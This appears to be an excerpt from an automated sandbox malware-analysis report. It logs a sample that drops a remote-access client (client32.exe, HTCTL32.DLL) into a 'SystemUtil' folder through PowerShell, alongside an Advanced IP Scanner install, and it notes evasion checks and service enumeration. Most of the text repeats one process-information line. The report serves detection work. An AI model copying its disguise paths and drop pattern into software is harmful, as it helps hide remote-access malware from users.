                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                  Malware Analysis System Evasion

                                  barindex
                                  Contains functionality to detect sleep reduction / modifications
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685991F07_2_685991F0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685A4F307_2_685A4F30
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,_memset,_memset,FreeLibrary,CloseServiceHandle,7_2_11127110
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,_memset,_memset,FreeLibrary,CloseServiceHandle,8_2_11127110
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7569Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2088Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeWindow / User API: threadDelayed 3279Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeWindow / User API: threadDelayed 428Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeWindow / User API: threadDelayed 4979Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\printsupport\windowsprintersupport.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-MH1O8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-LEVQP.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-5URF2.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-92N74.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-MB1RQ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-OESQ5.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-ET1Q4.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\pcre.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-L4L9S.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-I1VEE.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SystemUtil\remcmdstub.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-56HU1.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-2Q7I9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-QDVS6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-IVQT8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-2QTH6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-2QS06.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\ssleay32.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-A7U9L.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-V3C3T.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-U7801.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-PELB8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-4U5GH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-6H7V6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-F5QT3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-NB2QQ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-Q62S4.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\vcruntime140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-012CR.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-QAKOH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-FOUIF.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-5BNS6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\msvcp140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-FNUE4.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLLJump to dropped file
